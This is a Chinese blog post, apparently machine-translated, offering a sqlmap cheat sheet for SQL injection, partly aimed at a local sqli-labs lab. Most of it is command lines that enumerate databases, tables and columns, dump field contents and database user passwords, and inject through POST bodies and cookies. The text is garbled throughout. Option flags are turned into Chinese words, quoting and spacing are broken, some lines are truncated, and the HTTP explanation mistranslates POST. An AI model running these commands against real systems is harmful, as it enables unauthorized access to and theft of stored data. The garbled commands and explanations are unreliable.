首页 > 编程知识 正文

SQLmap中columns命令,sqlmap基于时间盲注命令

时间:2023-05-04 14:58:39 阅读:8801 作者:691

HTTP协议规定,开机自检提交的数据必须放在消息主体(实体-主体)中,但协议没有规定数据需要使用什么样的编码方式。 在ASCII码中传输HTTP协议,并在重传TCP/IP协议的基础上建立APP应用层规范。 HTTP请求分为三部分:状态行、请求标头和消息主体。 如下所示。

通常,服务端根据请求标头中的Content_Type字段,获取请求中的消息主体是如何编码的,并分析消息主体。

SQLmap常规操作GET格式python SQL map.py-u“http://URL地址/index.PHP? id=1” //注入判断-u:URL地址参数

python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-1/index.PHP? id=1”- -查看banner//数据库版本

python sqlmap.py-u“http://URL地址/index.PHP? id=1”- -当前用户//当前用户

python sqlmap.py-u“http://URL地址/index.PHP? id=1” --password //数据库用户密码咨询

python sqlmap.py-u“http://URL地址/index.PHP? id=1”- -查看DBS//所有数据库

python sqlmap.py-u“http://URL地址/index.PHP? id=1” --current-db //查看当前数据库

python sqlmap.py-u“http://URL地址/index.PHP? id=1” --tables //查看所有表格

python sqlmap.py-u“http://URL地址/index.PHP? 查看id=1” --tables -D A //库下的所有表

python sqlmap.py-u“http://URL地址/index.PHP? id=1” --columns -D A -T B //查询a库b表下的所有列

python sqlmap.py-u“http://URL地址/index.PHP? id=1” -C “E,F” -D A -T B //导出字段的内容

——POST格式3354 python sqlmap.py-u“http://URL/”--data“uname=123 passwd=123 submit”//指定页面的POST注入

Python sqlmap.py -r“绝对路径文件名”--level 3

python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-20/index.PHP”--cookie=“uname=admin”- -

Python sqlmap.py -r绝对路径文件名. txt注入-level2///检查文件中的cookie字段

python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-20/index.PHP”--cookie=“uname=admin”- -

python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-1/index.PHP? id=1”- -查看主机名称//主机名

阅读全文

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。

Copyright © 2012-2020,Powered By 恩蓝号 滇ICP备2023008288号-2